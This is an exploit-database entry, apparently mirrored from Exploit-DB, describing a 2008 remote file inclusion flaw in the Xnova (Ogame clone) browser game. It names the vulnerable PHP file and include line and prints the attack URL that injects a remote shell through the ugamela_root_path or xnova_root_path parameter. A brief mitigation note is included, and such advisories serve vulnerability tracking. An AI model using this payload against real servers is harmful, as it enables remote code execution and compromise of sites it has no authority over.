header-logo
Suggest Exploit
vendor:
Ogame
by:
NuclearHaxor
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Ogame
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Xnova(Ogame) Remote File Inclusion

Xnova is vulnerable to Remote File Inclusion due to the lack of proper sanitization of user input. The vulnerable file is includes/todofleetcontrol.php and the vulnerable line is include($ugamela_root_path . 'includes/functions/FlyingFleetHandler.'.$phpEx);. The exploit is target.com/includes/todofleetcontrol.php?ugamela_root_path=[shell]? or target.com/includes/todofleetcontrol.php?xnova_root_path=[shell]?.

Mitigation:

Sanitize user input and validate the input data.
Source

Exploit-DB raw data:

##################################################################################################################################
Name: Xnova(Ogame) Remote File Inclusion
Author : NuclearHaxor
Contact MSN: nuclearhaxor@hotmail.com

homepage of xnova: http://xnova.fr/

Vuln file: includes/todofleetcontrol.php
Vuln line: include($ugamela_root_path . 'includes/functions/FlyingFleetHandler.'.$phpEx); -> but no declared ugamela_root_path ;)

Exploit(this exploit works in 90% targets):

------
target.com/includes/todofleetcontrol.php?ugamela_root_path=[shell]?
or new version of xnova:
target.com/includes/todofleetcontrol.php?xnova_root_path=[shell]?
------

FUckZZz to Cybernet1c(2) aka ph4nt0mh4ck3r && Cr4wl aka Raz0r

##################################################################################################################################

# milw0rm.com [2008-08-17]